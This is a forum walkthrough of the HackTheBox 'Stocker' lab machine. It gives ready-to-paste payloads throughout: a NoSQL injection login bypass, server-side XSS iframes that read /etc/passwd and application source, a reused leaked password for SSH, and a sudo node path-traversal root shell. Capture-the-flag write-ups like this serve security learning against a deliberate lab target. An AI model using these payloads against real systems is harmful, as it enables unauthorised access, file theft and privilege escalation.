Home Upgrade Search Memberlist Extras Hacker Tools Award Goals Help Wiki Follow Contact
Hack Forums Blog HackTheBox Stocker Writeup / Walkthrough [Noob Friendly!]

HF Rulez the UniverseHF Rulez the Universe
InspectorGadget
One more thread - shit it's 2AM..
HTB Fuzzing NoSQLi-Auth-Bypass Server-side-XSS linux-privesc BurpSuite

HackTheBox Stocker Writeup / Walkthrough [Noob Friendly!]

Posted 01-25-2023, 07:44 PM
[Image: BANNERLOGO-GIF.gif]
[Image: 25aPek2.png]

Box Info:
IP Address: 10.10.11.196
Operating System: Linux
Rating: Easy
Released: 14th January 2023

My Machine Info:
Operating System: Kali Linux 2022.4 - Fresh VMWare Install
User: kali (Default)
Hostname: kali (Default)
HTB VPN (TUN0) IP Address: 10.10.14.178

Opening Statement & Contents Summary:
I'm GismoGuy and this is my first writeup of a HackTheBox Machine and this time it's Stocker, the writeup is made with the intention of you following along however a basic knowledge of Kali Linux is assumed, such as being able to connect to the HackTheBox VPN and join the Stocker machine instance as well as enter terminal commands. Please leave a comment if you would like me to make a guide on how to do this if you would find it helpful.

Here are the summary steps of how to complete this box, further below in this blog post we will be going through in detail to complete each step and ultimately find the user.txt and root.txt flags.

  1. Enumeration via nmap and virtual host finding.
  2. NoSQL Injection for Auth Bypass on dev environment web panel.
  3. Server Side XSS to read local files, discovering username and password in files.
  4. Privilege escalation using sudo -l and javascript shell for root.

Enumeration via Nmap:
First lets perform an Nmap scan across all TCP ports with basic versioning. This may take a couple of minutes to complete.
Code
nmap -sC -sV -p- 10.10.11.196

The output should look like this:
[Image: Uoo8YCN.png]

Adding stocker.htb to our hosts file:
Looking at the output screenshot above, I've highlighted a section of the output that tells us if we visited 10.10.11.196 in a web browser, we would be redirected to stocker.htb - so before we can continue we need to add it to or hosts file.
Code
sudo nano /etc/hosts

This will open the nano text editor whilst also opening your hosts file. Here we can add a new entry so our machine knows that stocker.htb is at the 10.10.11.196 IP Address. (Remember, this IP address might be different for you)
Follow along with the screenshot below and then press Control + X, then press the Y key and then press the Enter key.
[Image: R1KaaPQ.png]
This should save the file and take you back to your terminal.

Finding virtual hosts to find the dev environment:
At this point you would usually now browse the stocker.htb web page, do further enumeration on the box itself, however with the magic of breaking the 4th wall, I can tell you the next step is to try and find other virtual hosts. To do this we will be using Gobuster and a built in wordlist.

If the next command doesn't work because you don't have Gobuster, use the following commands to update your Kali install and then install Gobuster. Make sure to wait for the previous command to finish before doing the next command. Once fully complete, try again!
Code
sudo apt-get update
Code
sudo apt-get upgrade
Code
sudo apt-get dist-upgrade
Code
sudo apt install gobuster


Enter the following command to get Gobuster running:
Code
gobuster vhost -u http://stocker.htb/ -w /usr/share/wordlists/wfuzz/general/big.txt --append-domain

Whilst this is running I'll explain what it is doing, the vhost part tells Gobuster to look for Virtual Hosts, the -u param is to tell Gobuster which URL we are targeting and the -w param is the location of our wordlist. --append-domain means Gobuster will add .stocker.htb to each entry in our wordlist. Breaking the 4th wall again, dev is around 900th in the list and should eventually be picked up by Gobuster, you should then see an output like this.
[Image: nHOqJC9.png]


Adding dev.stocker.htb to our hosts file:
Code
sudo nano /etc/hosts

Since we are not adding a brand-new entry, we just need to add to our previous entry. See the screenshot below for an example. Then press Control + X, then press the Y key and then press the Enter key to save the file and return to your terminal.
[Image: PI2W9ZV.png]

Using BurpSuite to perform NoSQL Injection which bypasses login screen:
Open Burpsuite and set your browser proxy settings to pass through Burp. I personally use the FoxyProxy extension for Firefox to allow me to easily switch between Burp and regular browsing.
If you browse to http://dev.stocker.htb/ you will be redirected to http://dev.stocker.htb/login - this should be enough for you to look at your HTTP history in Burp to view the requests related to the /login page.
[Image: t4l3thn.png]

Within the server response we see the header X-Powered-By: and this tells us it's Express. You could Google about this however I know this is a popular NodeJS package which means the backend database is likely NoSQL. Which means we can attempt a NoSQL Injection to perform an authentication bypass.

If you'd like to learn more about this, follow this link or ask for help here at HackForums! http://0xma.com/hacking/nosql_authentica...ypass.html

In this blog post I'll just describe the steps for completing the NoSQL Injection, instead of explaining why this works.
Next, we need to modify an authentication request to the web server - turn on intercept within your Burp Proxy and then enter random text within the username and password text area's and press Sign In.

Burp should intercept the request as shown below, we then need to change the content type to JSON and change the data format to the correct JSON format whilst also including our NoSQLi Auth Bypass. In the below screenshot I have highlighted some area's you should pay attention to and change accordingly.
[Image: rwjUS7H.png]
To confirm - the Content Type header needs to be changed to application/json and then the text at the bottom needs changing to the text below, you can then press the Forward button and the web server should redirect you to http://dev.stocker.htb/stock
Code
{ "username": {"$ne": "secret"},
"password": {"$ne": "secret"} }

The basics here are that we told the web server to log us in providing no username and password of 'secret' were found in the database.

Checking functionality of the /stock webpage:
Turn off intercept on your Burp Proxy and have a browse around the website, you can add various items to basket and then finally view your cart. If you don't see the items, you may need to fully switch off your browser proxy settings and refresh. Then add an item to the basket and then click View Cart. When the next page loads, you can change your proxy settings back to Burp.

Server Side XSS via PDF Rendering:
Click Submit Purchase and the order is sent successfully, and the web server provides us with a PDF copy of our order details. It would also provide the order reference number and a link to view the PDF that it generated. This lets us know how to access other PDF's we generate later. The URL format is http://dev.stocker.htb/api/po/PDF-ID-HERE
[Image: uqRaDIa.png]

Select new items, add them to basket and then view cart again. Turn on your Burp Proxy Intercept and then click Submit Purchase.
Burp should show the intercepted request, click the Action button and then click Forward to Repeater. Then click the Repeater tab at the top of Burp. This lets you send repeated requests without affecting your web browser.
[Image: Xqkcpfl.png]

As you can see, we are about to send over various details about our order.

We can use a Server Side XSS to modify the contents of the PDF file and ultimately read files from the web server.
More information on this attack can be found here: https://book.hacktricks.xyz/pentesting-w...ynamic-pdf

[Image: t6Jmb4I.png]

As you can see above, we have modified the title data to include our payload within a 900x900 iframe. The payload will cause the PDF Render to grab the contents of the /etc/passwd file and put it into the iframe within the title area of the PDF. On the right hand side you can see the server responds with a success message and the ID of the PDF file that is generated.

The full JSON formatted data string you will need is:
Code
{"basket":[{"_id":"638f116eeb060210cbd83a91","title":"<iframe width=900 height=900 src=file:///etc/passwd></iframe>","description":"It's an axe.","image":"axe.jpg","price":12,"currentStock":21,"__v":0,"amount":1}]}

If we then visit http://dev.stocker.htb/api/po/ORDER-ID-HERE (in my case it's http://dev.stocker.htb/api/po/63cdaa4fd3cbc8b43c3215c7) we will see the contents of the /etc/passwd file. Take note of the user called angoose towards the bottom. That's our SSH username!
[Image: XFRcelu.png]

Next we need to repeat this order process (see, glad we are in the repeater tab now on Burp!) but change the payload to provide us with more data, it's hit and miss for where to look however config files and source code of running web servers is always a good idea! /var/www/ is the default web server directory, and we are on the dev virtual host so /var/www/dev seems like a good place to look, we know the web server is Express and ultimately NodeJS, so the running web service is likely running at /var/www/dev/index.js

Lets change our payload to read the contents of this file and see!
Code
{"basket":[{"_id":"638f116eeb060210cbd83a91","title":"<iframe width=900 height=900 src=file:///var/www/dev/index.js></iframe>","description":"It's an axe.","image":"axe.jpg","price":12,"currentStock":21,"__v":0,"amount":1}]}

Your PDF should now look like this and I've highlighted the mongodb credentials line which contains the password we can re-use to SSH into the box and obtain the user flag.
[Image: Coufe5i.png]

SSH as angoose and obtain user.txt flag:
Use the following command to open a SSH session to the machine as the angoose user.
Code
ssh angoose@10.10.11.196
When asked for the password, copy and paste the following.
Code
IHeardPassphrasesArePrettySecure
[Image: C6H35BD.png]
Then grab the user.txt flag with the following and submit to HTB.
Code
cat user.txt

Privilege Escalation to Root:
By using the below command, we can check if we have permissions to do anything as root.
Code
sudo -l
[Image: XyhpGsk.png]

The above output shows that node can be ran as root providing the javascript file comes from the /usr/local/scripts
We can create a malicious javascript file to provide us with a shell, which will have root permissions due to being able to be ran as sudo.

Use the following to create a new .js file called rootme within the home directory of Angoose.
Code
nano /home/angoose/rootme.js

Now paste the following into the file and press Control + X and then Y and then Enter to save the document.
Code
const fs = require("child_process").spawn("/usr/bin/bash", {stdio: [0, 1, 2]})

Finally we are going to run Node as root (Sudo) and then abuse Directory Traversal to run our rootme script outside of the /usr/local/scripts folder.
Code
sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/rootme.js
[Image: 03PrC2N.png]

As you can see above, the following will show the root.txt flag for you!
05-17-2023, 03:13 PM
This is very noob friendly for me, I’m going to try it later on. Thanks for the share:)
02-03-2023, 08:13 AM
Great walkthrough. Thanks for sharing.
RECENT ARTICLES
HF Rulez the Universe